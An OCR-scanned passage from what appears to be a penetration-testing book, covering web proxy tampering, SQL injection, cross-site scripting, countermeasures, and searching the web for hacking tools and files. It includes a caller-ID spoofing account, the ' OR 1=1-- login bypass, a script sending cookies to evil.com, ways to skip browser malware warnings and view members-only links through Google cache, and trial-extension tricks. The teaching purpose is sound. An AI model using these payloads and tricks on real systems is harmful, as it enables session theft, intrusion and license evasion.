the “amount” value and selecting Continue has the same result as it does in Tamper Data. Tools 
like Paros Proxy or Tamper Data could also be used for manipulating the results of online polls. 
In poorly coded polls that send a POST parameter with a vote value of +1 (or something along 
those lines), the attacker could potentially add (or even subtract) an unlimited number of votes by 
editing that value. Reputable online polls should not allow you to do this, but there are certainly 
many other opportunities out there. 

Let me share one other example of how Paros Proxy can be useful for modifying data. In this 
case the data in question was not changing a price like we did with Tamper Data, but a phone 
number. One of my previous ISPs was a small regional company that also offered VoIP services. 
Conveniently for its customers, the ISP provided a web interface where users could change various 
settings. One of the more interesting features was the ability to set the outgoing caller ID. For 
example, if a user had multiple lines, the web page would have a drop down box listing the mul- 
tiple numbers, and you could select which number you wanted to go out as your called ID. This 
would be particularly useful if you only wanted to share one outgoing phone number and protect 
your other "internal" numbers. 

For most customers with only one phone number, the drop down box simply contained that 
one number and there was no significance to changing anything because there was only one 
option. I thought however that Paros might be useful in this circumstance. And in this case, I was 
right. 

In this example I allowed my original (real) number to be selected in the drop down box, 
started Paros, and then submitted the request. The Paros Trap box included a number of options, 
and one of them was a string of data, which contained this original outgoing phone number. 
So it appeared that, at a minimum, I could at least change the number. And indeed, I was able 
to change the number. The newly refreshed web interface now showed the modified outgoing 
number. 

In this case, we could control what data was being sent via the web interface, but it was another 
question entirely as to whether the modified outgoing number would actually work. Fortunately 
(for me anyhow), it did. When I called a third-party number, the caller ID that was displayed to 
them was indeed the modified outgoing number that I invoked with Paros. So instead of changing 
a price, I was able to spoof caller ID by modifying the data in the web interface page. 

Again, like Tamper Data, there are other proxy options like SPIKE Proxy, BURP Suite, and 
others. Many of these programs have similar features, and some of them have options exclusive to 
the others. 'Their mention (or lack thereof here) should not be considered an endorsement of one 
option over another, but rather just an author preference. 


Firebug 


Firebug is a web development add-on for Firefox (https://addons.mozilla.org/en-US/firefox/ 
addon/1843/). Firebug allows you to inspect, edit, debug, and monitor HTML, CSS, and 
JavaScript in real time, as well as accurately analyze network usage and performance. Firebug also 
has over 40 individual extensions that work directly with Firebug to enhance its capabilities. 

While Firebug was originally created as a web developer's tool, creative penetration testers have 
used Firebug to find many cross-site scripting (CSS) and cross-site request forgery (XSRF) vulner- 
abilities. Firebug is also useful in searching for ways to break client-site input validation in target 
web pages or web applications. 
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SQL Injection 


SQL injection is a vulnerability associated with the ability of a user to input data directly to an 
underlying database to execute commands within that database. Ultimately, the user may be able 
to access, add, change, or delete data within the database without any authorization. Injection 
attacks were rated by the Open Web Application Security Project (OWASP) as the number one 
web application security risk. 

One could write an entire book on SQL injection (indeed, some already have), but we have 
one section of one chapter so our discussion will not attempt to be comprehensive. Rather, we can 
show a few common examples to demonstrate the overall concept. The vulnerability associated 
with SQL injection is specific to how user input is handled. When certain escape characters are 
incorrectly filtered, the user input is executed. It is also important to note that the web applica- 
tion code, not the service, is the source of the vulnerability. Let’s take a look at an example. In our 
example (as shown above), we'll be entering our SQL injection attack into a form, but many such 
attacks can also be executed by entering commands via the address bar. 


Username 


Password 


Register | Lost your password? 


To understand how an SQL injection attack works, it is necessary to understand what infor- 
mation is sent when a user enters their username and password into a form. In this form, when the 
user clicks Log In, the following information is sent from the web front end directly to the SOL 
database: 


'SELECT * FROM Users WHERE Username - input AND Password - input' 


In this case, whatever text is typed into the username box is inserted into the first input space, and 
likewise for the password. How do we determine this? There are a number of ways, but the most 
common are viewing the source of the web page, trial and error, and research. Furthermore, deter- 
mining the type of SOL database (MySQL, Microsoft SOL, Oracle, etc.) can be useful in deter- 
mine the exact language syntax, as the difference in an attack working or not is very specific to the 
database, its syntax, and characters. It should also be stated at this point that this is an example of 
extremely poor coding that you would be unlikely to encounter in an enterprise environment (and 
if you should, you might have bigger problems). 
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Let’s examine how a normal login would occur: 


Username 


Bob 


Password 


Je 3c dc Je Je eee 


[E] Remember Me Log In 


Register | Lost your password? 


In this example, the command that is sent from the web interface to the SQL database is as follows: 


‘SELECT * FROM Users WHERE Username = Bob AND Password = password’ 


‘The pseudo-English translation of this statement would be something like, select all users from the table 
“Users” where the username is equal to Bob and the password is equal to password. Note of course in this 
crude example that the password is not even being hashed; in most cases the web application will hash 
the password and match it to a password hash in the database (or something similar). Most databases do 
not store passwords as clear text. By having some basic knowledge of the SQL language, we can abuse 
poorly written code to execute commands in the SQL database. Consider the following example: 


Username 


Anyuser' OR 1=1--; 


Password 


D Remember Me 


Register | Lost your password? 


In this example, the command that is sent from the web interface to the SQL database is as 
follows: 


‘SELECT * FROM Users WHERE Username = Anyuser' OR 1=1--; 


Notice that this is a very different command; we didn’t even enter a password. The translation of this 
statement is equivalent to: select all users from the table “Users” where the username is equal to Anyuser 
or 1 is equal to 1. Let's examine this in a little more detail. First, we are asking the database to find a user 
named Anyuser. The user Anyuser could be any user, or no user; in this case it doesn’t matter because 
of how we crafted the remainder of the command. Second, the ' after Anyuser is not correctly filtered. 
Third, we created an OR statement (1 = 1), which is always true. Lastly, the double hyphen terminates 
the query. This statement is always true, and in this case, will log us into the first account on the system 
(which is most often the administrator) without any requirement for a password. 
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Further attacks might include the use of stored procedures, like Microsoft SOL Server's xp 
cmdshell stored procedure. If enabled, this would allow us to execute from the command line of 
the SOL server. Depending upon what privileges the SOL service is running under, this just might 
be game over for this particular box! 

SQL injection is most commonly a trial-and-error attack, although there are some tools that 
exist to help automate the process. One example is sqlmap (http://sqlmap.sourceforge.net/), which 
is a command line—based open source penetration testing tool that automates the process of 
detecting and exploiting SOL injection flaws and taking over of back-end database servers. 

Another example is SQL Inject Me (https://addons.mozilla.org/en-US/firefox/addon/7597/), a 
Firefox add-on that automates the process of having to manually enter dozens or even hundreds 
of strings in a trial and error attack. In fact, in a recent penetration test, I used SQL Inject Me to 
identify an SQL injection vulnerability, which resulted in successfully penetrating that particular 
system. It should be noted, to state the obvious, that automating an injection attack to send dozens 
or hundreds of strings against a particular server will undoubtedly be noisy. In my test, noise was 
not an issue, but if stealth is important to your attack, an automated attack may not be the best 
option. Again, this is not intended to be a comprehensive look at SOL injection attacks; rather, 
these are just some examples to give you an idea of what is possible. 


Cross-Site Scripting 


XSS is a vulnerability associated with the ability of a user to inject data into a web page viewed 
by another user. In the case of XSS, the user may be able to access sensitive data without autho- 
rization, access credential data, or steal session cookies and impersonate other users, just as a few 
examples. XSS attacks were rated by OWASP as the number 2 web application security risk. 
Again, our discussion will necessarily be limited by size, so we'll just show a few examples. 

Steve Kemp, a UK-based systems administrator, has created a very simple but effective and interac- 
tive XSS tutorial to walk you through XSS attacks (http://www.steve.org.uk/Security/ XSS/ Tutorial/): 


gj ss ite Scripting T 
Ele Edt View History Bookmarks Tools Help cH 
G- C X A (QO http//wwwsteveorguk/Security/XSS/Tutorial/ B -|w ELS 
© XSS /Cross-Site-Scripting Tutorial | + | = 
Steve _ Free Software — Projects Extras 
About Steve For Linux Computer My Blog 
Steve.org.uk Contact Me For Windows security TODO List 
Steve Kemp's Homepage Images Software jQuery code Sitemap 
repositories apemtpd code 
Security XSS Introduction 


inhodafes This is a simple online explaination of XSS attacks designed to allow people to see in a hands on 
manner. 

Advisories 

It Is interactive so that people can see the effects in real time, and to be simpler to follow. 

Exploitation 

XSS 1. Introduction: Setup the cookie 

2. Simple cookie stealing 

XSS Tutorial 3. Basic filtered input 

4. Evading simple filtering 

5. 1can run script, what now? 

6. Protecting against these attacks 


Feedback? 


This is intentionally a very simple set of "lessons", and I'm glossing over a lot. 


Any comments are welcome though - mail me if you wish. 


Done @ © 0MB/32MB || 11MB/50MB Fiddler: Disabled @ A cru ge — FoxPros Disabled @ È 
Se ——— OOSGESROMLLDALLBSGOREÓEOQQECLLEUEAXOEgEzRAUJVEU 
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Steve’s “Introduction” page sets up a cookie that is used in subsequent pages: “Simple Cookie 
Stealing” demonstrates how a user can use JavaScript in a text input box to display a cookie; 
“Evading Simple Filtering” shows how users can execute JavaScript by clicking on a link even 
though the <script> tags are filtered. Next, Steve demonstrates some more useful techniques: 


Peer Te 
File Edit View History Bookmarks Tools Help c 
ES- Q X A E hitps/www.steve.org.uk/Securty/XSS/Tutorial/whatnow.htm! $168 -| [W Witinedia (en P 


| © XSS Tutorial: can run script, what n... | 


1» [182 


I can run script, what now? 


You've seen how you can enter script into a page and have it run when a user clicks on a link, or views a page. 
This is really just a proof of concept, you don't want to have people viewing the popup boxes all day! 
So .. you want to do something more useful? 
Redirection 
One common technique is to redirect the user to a different website which you control. This would allow you to record the users cookie for later (ab)use. 
The way I've done this in the past is to use code like this: 
«script? 
document.location = 'http://evil.com/blah.cgi?cookies' + document.cookie; 
</script> F 
This would redirect the user to a CGI script called 'blah cg on a website ‘evil.com’. 
The CGI script gets given the cookie of the innocent user as a parameter called ‘cookie’. This could be recorded for use later. 
Other Tips 
Using the onClick handler you have to rely upon the user clicking on a link you have placed. 
You do run the risk that the user will not click it, so what then? 
You can use another method onMouseOver, this allows you to have code executed when the mouse pointer merely moves over a link. 


This is used as follows: 


<a hrefe"whatnow.html" onMouseOvere"alert (document.cookie) ;">Test</a> 


As an example move your mouse over this link, 


Soria b  FoxyProny: Disabled O È 


Daten ben inom 
Done 


@ 0MB/32MB 9 1MB/50MB Fiddler: Disabled 
[a 3 


Consider the following code: 


<script> 
document.location = "http://evil.com/blah.cgi?cookie-' + document.cookie; 


</script> 


Here, Steve demonstrates a very simple way of redirecting the user to another website (preferably, 
one that you control) and recording the cookie for later use. Let’s take a look at a real world vulner- 
ability that Steve located on a popular free software project site: 


The Vulnerability 


Each project page contains a collection of links and information about it, as well as the ability for 
visitors to leave comments. 


Two forms of comments are allowed plain text, or HTML text. 


The attributes of the HTML are inadequately sanitized, allowing a malicious commentor to create links 
which would execute arbitary javascript. 


The following is an example of such a malicious link: 


<a hrefe"http://foo.com/" onMouseOver="alert (1) ;">Foo.com</a> 


Impact 


The site uses a session ID stored in a cookie to keep track of a users state. If a user is logged in and 
dicks upon a link, (or moves over it depending on the code), then they could be redirected to a 
different site which could steal their login credentials. 
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In this case, the comments area of the site allowed both plain text and HTML. And because 
the HTML attributes were not adequately sanitized, a user could post code to execute arbitrary 
JavaScript by means of a malicious link into the comments area. This malicious link would then 
be displayed to subsequent users. This is a very basic introduction to XSS, but I think it's a good 
demonstration from a user's point of view; please check it out when you have the opportunity. 
Thanks Steve! There are many more real world vulnerabilities out there. The website http://www 
.xssed.com is the largest online archive of XSS vulnerable websites. 


© Xs | Crone Site Serping OES) SAE St and SRE Da I TS T ^ y 
a 
CBB? € x e 8 oneri BY 709 - Ew watipedia en 2| & 
NSS XSSed | Cross Site Scripting (XSS) att... |+- | = 
«5 SS (ul > 


attacks information 
Home News Articles Adv. Submit Alerts Links XSSinfo About Contact 


XSS Archive | XSS Archive * | TOP Submitters | TOP Submitters * | TOP Pagerank | © search 


Just another persistent Twitter XSS 38444 total xs: 


7 s 
12419 special xss 
bir reed 2224 fixed 

5429 xss onhold 
“UPDATED 20 Jul 2010 : 10:39pm"- A mirror of the now corrected vulnerability has |1741 EW subscribers 
been published. Also, read on an excellent technical blog post by Bily (8K) Rios about another 
Twitter XSS bug... Romanian security researcher “d3viI” from Security-Sh3ll, has nobified us 
Just a few minutes ago about a persistent XSS that he discovered on Twitter's help center.. YwcctsnbouE XS: 


read more. 


YouTube persistent XSS vulnerability 


ers from a Romanian team (InSecurityRomania) have revealed a critical 
ite scripting (X55) vulterabiity which affects YouTube's comment feld. 


read more... 


Persistent XSS vulnerability affecting Twitter promptly corrected 
Sunday, 27 June 2010 


Indonesian security researcher, who nickname — "HáxOr-xox" 

Vinci www. Des. Sy eet. has discovered and suited to the XSS ordwe, a 
GM Pata cuerda Pafptng winendly (uai uen] on the’ popa 
microblogging platform Twitter.com, 


read more... 


National Security Agency (NSA) SSL web page XSSed 
Wednesday, 23 June 2010 E 
Done @ F 02M8/32MB |j 251MB/30MB Fiddler Disabled EF] BF FaxPioy: disabled @ 


Assuming you already know how XSS works, quite possibly the best resource is Robert 
“RSnake” Hansen's Cross-Site Scripting Cheat Sheet (http://ha.ckers.org/xss.html), which is also 
an appendix to the OWASP 2.0 guide. He is also one of the authors of XSS Exploits: Cross Site 
Scripting Attacks and Defense (Syngress, 2007), considered an authoritative book on XSS. 


File Edit View History Bookmarks Tools Help ŒA 


M RS http://ha.ckers.org/xss.html 
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XSS (Cross Site Scripting) Cheat Sheet | + 
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XSS (Cross Site Scripting) Cheat Sheet 
Esp: for filter evasion 


Countermeasures 


In the last section of this chapter, we'll talk about how to prevent or at least mitigate, many of the 
issues we discussed. Generally speaking, exact countermeasures will be specific to the particular 
SQL language, and to the particular code on the site in question, and therefore it is more or less 
impossible to give exact countermeasures to every possible attack, especially in an overview chap- 
ter such as this. Rather, the idea here to is give the defender an idea of some of the general concepts 
that are used to prevent or mitigate the attacks described in this chapter. 
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Parameterized Statements 


As we saw with SQL injection, the problem lies in the ability for the user to embed input directly 
within an SQL statement. This is a result of poor coding on the programmer’s part. The solution to 
this is the parameterized statement. A parameterized statement is typically a fixed SQL statement 
where the user input is bound to a parameter, rather than input directly. 


Validating Inputs 


Validation is a countermeasure that is used to combat malicious inputs (i.e., changing the price 
as we showed in the first part of this chapter), SOL injection, and XSS. In the case of the price- 
changing example, validation means comparing the user inputs from the client side to the expected 
results on the server side. If the data doesn't match up, it should be rejected. In both SQL injection 
and XSS, validation can mean using whitelists and/or blacklists to validate expected characters 
and reject unexpected or malicious characters or strings. 


Escaping Characters 


Escaping is a means of treating a character differently than you would in some normal context. In 
the case of SQL injection, it means preventing injections by escaping characters that have special 
meaning in the SOL language. In the case of XSS, it means preventing malicious code by escaping 
any untrusted data. 


Filtering Characters and Statements 


Some sites (especially those that thrive on user interaction) will give users the option of using 
(some) HTML, so in these cases the sites simply cannot escape all HTML inputs. In this case, 
the user inputs need to be filtered. Filtering provides additional granularity, but it also imperfect 
because of different browser implementations of HTML standards and differences in features. 
Sites will also try to identify malicious input and filter it out. 


Encryption 


Presuming that an attacker is able to bypass your other security measures and gain access to 
your data, there are some additional countermeasures that are available. For example, although it 
should be obvious, some SQL databases continue to store passwords in a plain text format. While 
ordinary users do not normally have direct access to the database (and thus do not have direct 
access to the passwords), encrypting the passwords and storing them as a salted hash is a small but 
powerful defensive measure should an attacker gain access. 


Account Privileges 


Installed services (such as SQL Server) should be installed with only the permissions necessary to 
complete its job. Again, this seems obvious, but many services in the past installed to “local sys- 
tem" (or other OS-equivalent) account access, which is unnecessary. If a user were to gain control 
of a service with local system access, it’s game over; if the account has been properly configured, 
the attacker will be limited to those permissions. 
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Errors 


Error pages are often filled with detailed messages to aid the programmer in fixing the error. The 
problem, of course, is that these error messages also provide the attacker with the same infor- 
mation. Error pages should return a general message—in other words you want to remove any 
information from an error message that could help an attacker assess the validity of a potential 
vulnerability. 


Further Resources and References 


The SQL injection example was used with the permission of Chris Forant. The XSS tutorial page 
(http://www.steve.org.uk/Security/ XSS/Tutorial/) was used with the permission of Steve Kemp. 
The Cross-Site Scripting Cheat Sheet (http://ha.ckers.org/xss.html) was created by Robert ^RSnake" 
Hansen, and is also an appendix to the OWASP 2.0 guide. For more information on preventing 
SQL injection, check out the OWASP SQL Injection Prevention Cheat Sheet (http://www.owasp 
.org/index.php/SOL Injection, Prevention. Cheat. Sheet). For more information on preventing 
XSS, check out the OWASP XSS Prevention Cheat Sheet (http://www.owasp.org/index.php/ 
XSS. (Cross Site Scripting) Prevention, Cheat. Sheet). 


Chapter 6 
Finding It All on the Net 


Introduction 


A lot of people come to me and ask me to help them find things on the Internet. Well, if I find 
what they need and give it to them, I have helped them. But, if I teach them how to find what 
they need themselves, I have enlightened them. Every good hacker and any good defender have 
to know how to find files and information on the Internet. If they cannot locate the information, 
they may not have the means to attack the target or research the attack tool to defend their systems 
properly. 

Most people are unaware almost everything, and I mean everything, is available somewhere 
on the Internet. The key is to know the various methods and tools that will help you acquire what 
you need. Another factor is being able to have more than one method in your toolbox. If you stick 
to one method and it fails, you are out of luck. Another thing that can help you with your ability to 
research is to ask someone who knows how to find things. Joining forums is a great way to talk to 
people who may know how to help you find what you need. Also consider following people who 
are knowledgeable about the latest trends in the industry on Twitter. 

Let’s first start this chapter with a disclaimer. Never download illegal copies of software. 
The pirating of software is a serious problem and there are several agencies, such as the Business 
Software Alliance, that deal with the use and distribution of illegal software. Businesses and 
individuals can be fined large sums of money for using illegal software. Free illegal software is 
not always as free as some people think it is. Viruses and backdoors can be embedded into these 
illegal copies of software. It is true what your parents taught you, that you get what you pay for 
in life. However, having an understanding of the types of patches or cracks that hackers often use 
will allow you to get into the mind of a “hacker” and understand the methodologies they use to 
perform their tasks. Just because you have the ability to download illegal software, movies, and 
music does not mean you should. An ethical person would not choose to engage in such activity. 

Before ever conducting a Google (or other search engine) search, you have to “wear protec- 
tion.” Many of the sites mentioned in this chapter may contain links with malicious code that will 
launch when your browser makes a connection to their website. Do not use the same computer that 
you use to do your banking to research some of these concepts. Either use a separate computer to 
research hacking concepts or use a virtual machine (VM), preferably without tools installed. You 
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can download Server or Player for free from VMware. Server is recommended because it allows 
for one snapshot. You will need to purchase an additional copy of Windows if you are installing 
it within VMware. Of course, you could just use a version of Linux in your VM. Many websites 
allow you to download preconfigured Linux VMs, including http://www.backtrack-linux.org/. 
Using Linux and Mac when researching these concepts is never a bad idea, because they are less 
vulnerable to attack. 'The majority of malicious code is written for Windows systems because they 
are the most prevalent. However, Mac, Linux, and Unix also can get viruses (or Owned). 

One tool you can use to prevent getting your browser hooked is NoScript. NoScript is a Firefox 
add-on that will prevent dangerous JavaScript from launching when you visit websites. If you are 
not a Firefox user, try to become one. While there is no one browser that will meet the needs of 
every individual, the add-ons for Firefox make it a major player in the browser arena. 


Before You Start 


To install NoScript, install the latest version of Firefox and perform the following steps: 


1. Open your Firefox browser, and type http://www.google.com in the address bar. 
2. Search for add-ons. You do not even have to spell it right—ad-ons. 

3. Click on the link for Firefox add-ons (should be the first hit). 

4. Search for NoScript within all add-ons. 

5. Click the Add to Firefox button. 

6. Click Install Now and restart Firefox. 


The best security you can get in a web browser! 
Allow active content to run only from sites you trust, and protect yourself against XSS and 
Clickjacking attacks. 


RAMNCCIECESIGGPSER View privacy policy 


The developer of this add-on asks that you help support its 
continued development by making a small contribution. 


@ Contribute. Suggested Donation: $15.00 
What's this? 


Add to collection 
Share this Add-on 


While NoScript will prevent a majority of malicious code from executing on your system when 
you are using Firefox, it will also prevent websites that you may trust, like Facebook.com, from 
working properly. However, if you trust a site, you can click Options and allow that site. 


e lo Facebook - 
Ele Edt yew History Bookmarks Took Help 
[C] + C X GSB nein faceboccon] mamme A) 


v Show message about block 


facebook w Place message at the botto 
Audo feedback when scrip! 
‘Si Alow Scripts Globally (dang 
S) Alow allthis page 
Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Sg Jemporarly allow al this pe 
Alternativly, you can access the mobile version of Facebook here. E locked shes 
untrusted 
= È (Forbid fbcdn.net 
Facebook helps you connect and share with Sign Up brides 
: = F Forbid cooliris. 
the people in your life. It's free, and always will be. S iium 
 SjAllow facebook.com — 
a Si Femporarty alow facebook 
© Scripts Currently Forbidden | «SCRIPT»: 7 | <OBJECT>: 0 ———» 8 


Done f SO, To Disabled SÈ unted states 66.220.153.19 Facebook, Inc. 72,81,255.124 
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The HostIP.info Geolocation plug-in for Firefox is another great tool that can be used when 
you visit sites that you do not fully trust. After installing the extension, you will be able to hover 
over any hyperlink on any web page and perform an IP Geolocation lookup. 


HostlP.info Geolocation Plugin 
by Matt Valker, Brad Folkens 
Host: addons.mozilla.org 
ti IP: 63.245.209.91 - 
data. Works with a Location: Mountain View, CA, US 


To install the HostIP.info Geolocation plug-in, perform the following steps: 


1. Install the latest version of Firefox. 

2. Open your Firefox browser, and type http://www.google.com in the address bar. 
3. Search for add-ons. You do not even have to spell it right—ad-ons. 

4. Click on the link for Firefox add-ons (should be the first hit). 

5. Search for the HostIP.info Geolocation plug-in within all add-ons. 

6. Click the Download Now button. 

7. Click Install Now and restart Firefox. 


) Add-on Search Results for HostIP.info Geolocation Plugin :: Add-ons for Firefox - Mozilla Firefox 


Ele Edit Yew History Bookmarks Tools Help 
(z) "C a CaS) ntos:/addons.mozila.orglen-Us/firefox/search/?amHostIP.ifo--Geclocakc {7 - 


[B Most Visited |) Getting Started | Latest Headlines |`) Windows Marketplace 
| È Add-on Search Results for HostL.. E | *]] Mozia Firefox Start Page 


mozilla Register or Login Other Applications * 


Add-ons for & Firefox 
HostlP info Geolocation Plugin thin a 


Advanced - 


Add-ons for Firefox » Search. 


Refine Results q . 
Search Results 

Compatible with Showing 1 - 1 of 1 results for HostlP.info Geolocation Plugin 
> All Versions 

35 Newest Name Rating Popularity 

30 

HostiP.info Geolocation Plugin 

Categories by Matt Walker, Brad Folkens 
> 

a Displays Geolocation information for a website using hostip.info 12 reviews 

Privacy & Security data. Works with all versions of Firefox. 78 weekly downloacs 
hal 
Done addons,mozila.org |) 


Some people google what they need to find and believe they will be safe from executing malcode 
if they just view the web page in Google's cache. However, when a site is opened in Google's 
cache, items like pictures (or malicious code) will be retrieved from the original site. To avoid this 
problem, a user can install the Passive Cache add-on for Firefox. This will allow the user to read 
text-only information from Google's cache without fear of launching any malicious code. 
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Add-ons for Firefox » Extensions » Passive Cache 


& Passive Cache 1.2 


by Brian Baskin 


Passive Cache uses Google's text-only cache service and Archive.org Wayback Machine to 
display historical versions of a specified web link. This add-on allows for the viewing of a page, or 
site, while avoiding active connections to the target site 


| + ' Addto Firefox 


Updated March 9, 2008 


To install the Passive Cache add-on for Firefox, perform the following steps: 


1. Install the latest version of Firefox. 

2. Open your Firefox browser, and type http://www.google.com in the address bar. 
3. Search for add-ons. You do not even have to spell it right—ad-ons. 

Á. Click on the link for Firefox add-ons (should be the first hit). 

5. Search for Passive Cache within all add-ons. 

6. Click the Download Now button. 

7. Click Install Now and restart Firefox. 


Now, you can google any item in Firefox. If you want to view the text-only version of the web 
page, just right click on the web page in Google and select PassiveCache Google This Link. The 
text-only version of the web page will open in a new tab. You can also right click on any additional 
hyperlinks on the text-only page and select PassiveCache Google This Link. 


ESPN: The Worldwide Leader In Sports 


ESPN.com provides Open Link in New Window 
NFL, MLB, NBA, Co — OpenLinkin New Tab 
espn.go.com/ - Cacl- 


MLB Home su 
Save Link As. 

NBA Home 

NFL Home Seng Unk... 


World Cup 2010 | Copy Link Location 
IP2Location Lookup "173.194.33.104" 


@ DownloadHelper > 
S)NoSaipt 


More results from 


MLB - Major Lea: % 


ipsi 


Here is a good example of how the plug-in can help you. In this case, I am looking to down- 
load a file that is only available to registered members. In the case of this website, wiihacks.com 
is a forum where registration is free. The easiest thing to do is register and log in to the forum to 
view the links only registered members may view. In the case of wiihacks.com, I am a registered 
member, but I wanted to show how someone could use the plug-in to view what they are not sup- 
posed to see. This is not a problem unique to the this website, rather it is a byproduct of Google 
caching web pages that are not supposed to be viewable to the public. When the user clicks on the 
web link, they are locked out because only registered users may see the content. 
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rR Also your error is listed here on softchips forum. Do you have Cios38 rev14 installed? 
put ios 38 revi4 on your machine. for ios 249 download this. 

Junior Member 

Join Date: Oct 2009 CIOS, 249 

Posts 10 [Only Registered Members May View Links| Click here to register] 

Thanks 0 


Thanked2Timesin2Poss Your error is listed here ISSUE 95 
[Only Registered Members May View Links| Click here to register] 


When the page is viewed in Google Cache, or using Passive Cache, I can see and click the links. 


9. 12-17-2009 10:22 AM dem 
di 
imam: offline 


Junior Member 


Join Date 
Oct 2009 


Thanked 2 Times in 2 Posts 
Downloads 
0 


Uploads 

0 
Also your error is listed here on softchips forum. Do you have Cios38 rev14 installed? 
this 


CIOS 249 
http//rapidshare.com/file 


Researching with Caution 


Now that you are aware of some of the precautions that can be taken when you do research, we 
can discuss some of the techniques hackers use to obtain what they want from the Web. There is a 
proliferation of websites and forums where hackers can go to find tools and exploits that will assist 
them with their goals. An example of a site like this is www.crazyboris.org (make sure you type 
the “www” out or the site will not work). www.crazyboris.org has all types of bad files, including 
keyloggers, stealers, trojans, unpackers, poke code, and crypters. 


@ crazyboris - Windows Internet Explorer Loe 
6 De 7 crazyboris.org. wii Unsafe Webste H * X b pe 
Ele Edt View Favorites Toos Help 


pFavoes — @Scrazyboris fey A Ær Page sey Tos- @- 


P @ internet far Rio% + 


When you try to visit the Crazy Boris website, you will be warned by the latter versions of Internet 
Explorer that the website has been reported as unsafe (wonder why). Just click More Information, 
then Disregard and continue to visit the website (at your own risk, of course). You will also notice 
that the URL bar is red to further indicate to the user that the website is unsafe. 
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Ê Reported Unsafe Website: Navigation Blocked - Windows Internet Explorer 

GO > pires: [v] neste Webats ] «>| x | - 
Ele Edt View Favorites Tool Help 

x @- 

wy Favortes — (Reported Unsafe Website: Navigation Bl... 


fh > GG d pager Safety Toos- @e 


This website has been reported as unsafe 


www.crazyboris.org 


We rec 


mend that you d 


@ Go to my home page instead 


This website has been reported to M 
computer that might reveal personal 


soft for containing threats to your 
financial information 


(9 More information 


This webste has been reported to c 


@ Learn more about malicious software 
@ Report that this site does not contain threats 
@ Disregard and continue (not recommended) 


If you try to download any of the malware from the site and have Windows Defender installed, 
you will once again be warned that it is not recommended to download any files from this site. 
Be careful downloading any type of malware to your system. If you test the malware, you should 
be using VMs without tools installed and with the network interfaces set to host only mode. Also 
keep in mind that some of the more sophisticated malware is VMware “aware” and may not work 
ina VM environment. 

In general, “black hat” hackers do not like to pay for their software; they often use pirated 
software. When hackers download their software from a variety of places on the Internet, it is 
often packaged with a patch or crack that will allow the hacker to turn trial or “time-limited” 
versions of software into a full blown working package. Hackers will at times delete entries in the 
registry to extend trial periods or make trial versions into full ones. Sometimes hackers will have 
time on their side. Hackers often manipulate time settings to accomplish tasks like extending 
the trial period of software. If a hacker sets his BIOS to the year 2040, installs the software, then 
sets the BIOS back to the correct year, some software will extend the trial period by several extra 
years. Software companies are aware of these tricks and newer software will detect these attempts 
to circumvent the trial period. The Windows registry is a database of all settings on the system. 
It contains information about the programs that are installed on the system. The registry can be 
edited by typing regedit in the run box. However, Microsoft only recommends that advanced 
users edit the registry. If you really want to play around with the registry, install Windows into a 
VM and take a snapshot. If you hose the system, you can always return the computer to its work- 
ing state by returning to the snapshot. Never manipulate settings of software to extend the trial 
period, because doing so is illegal. It is, however, important to understand how a hacker thinks 
and what methods they use to perform their deeds. 

Many websites allow users to download thousands of items such as software packages, books 
on PDF, movies, and MP3s. Some of this software is legal, but the majority of it is illegal. Examples 
of legal software packages include Linux software packages like Fedora and Ubuntu. The majority 
of the software displayed on these sites is illegal. Most of these sites are hosted out of the United 
States and are located in countries that are immune from copyright laws. For example, the site 
caak.mn is based in Mongolia. These sites are like an “all-you-can-eat” smorgasbord for illegal 
software, music, and movie lovers. 
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YHAcon cant 


i | <OBJECT>: 0 


,131.237.115 Mobicom Company 


RapidShare 


While many of these sites display page after page of copyrighted material, most of them do not 
store any of the programs on their servers. Rather, they provide direct or indirect links to serv- 
ers where this software is stored. The sites www.rapidshare.com and www.megaupload.com are 
examples of sites that might store the files users are trying to download on their servers. Some of 
the links to these files are direct, like http://www.example.example/123/cd.rar. Links to these files 
on other websites are indirect, like hxxp://www.example.example/456/cd2.rar. The indirect links 
have to be corrected to work in a browser. Not only will this prevent noobs (newbies) from using 
the links to gain, it will prevent the propagation of these links across the Internet. Usually, these 
programs are split into several compressed files with a .rar extension. Once the files are uncom- 
pressed with a program like Winrar or 7-Zip they become one or more files or folders that contain 
the programs. Winrar is not free but the developers of it offer a free trial to users. 7-Zip is a free 
program available for download at www.7-Zip.org. 
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A hacker can use a search engine, like Google, to find any piece of software they need. An 
example would be using Fedora Core 7, an open source software package, and the term “rapid- 
share.com" in the search engine Google yields many results. Unfortunately, hackers can use this 
technique to find almost any copyrighted software, movie, or music. Search engine “power users" 
type what they are looking for and the name of a file hosting website, such as www.rapidshare. 
com, depotfiles.com, and megaupload .com. You should never use these techniques to do anything 
illegal; however, you can use these methods to look for legal software for "proof of concept." None 
of these sites endorse illegal activity. 

Some examples of searches that will yield you results for legal software include 


backtrack 3 iso rapidshare.com 
nc.exe rapidshare.com 
putty.exe rapidshare.com 
wireshark.exe rapidshare.com 
7-Zip megaupload.com 
ubuntu 10.04 megaupload 


Important note: Before leaving the safety of the Google search engine and clicking any resulting 
links, be sure to have NoScript running and use Passive Cache if possible. 


Web Images Videos Maps News Shopping Gmail more v 


Google fedora core 10 rapidshare.com Search 
About 68,100 results (0.20 seconds) Advanced search 
$J] Everything Fedora-10-i386-DVD.iso on RAPIDSHARE Released yesterday! 
"M 2 posts - 2 authors - Last post: Nov 29, 2008 
9 [ Log in to get rid of this advertisement] This is my 4th release of a linux distro on rapidshare, 
hope you enjoy it. 
v; Show search tools www.linuxquestions.org/.. /fedora.. /fedora-10-i386-dvd-iso-on-rapidshare-released- 


yesterday-686365/ - Cached 


Download fedora core 10 from Rapidshare, Megaupload, Uploading ... 
fedora 10 and Red Hat Enterprise Linux Bible in E-books, 9 mths, 13 Mb. 
http.//rapidshare.com/files/[.../0470413395 Fed10BIB.rar. Ashampoo core Tuner v1.10 ... 
www.warez-files.com/show-fedora-core-10.html - Cached 


fedora core 4 - RapidshareMix - Search for Files on Rapidshare 
Rapidshare links http-//rapidshare.com/files/.. /fedora core 4. ... 10 2680d1178199064 
armored core 4 scan ntsc armored core disc xbox360 ntsc jpg 1.01 MB ... 

www .rapidsharemix com/?q=fedora+core+4 - Cached 


Setting Up Openvpn On Fedora Core 11 Linux And Windows 7 Ultimate ... 

A Mandriva user kicks around Fedora Core 10: How does it compare? .... http-//peb.pl/nauka- 
Hechnika/374062-rapidshare-wielka-paczka-informatycznych- ... 

www. linuxidx.com/linux. php?q=Setting+Up...Fedora+Core 


Fedora 7 Download Links 

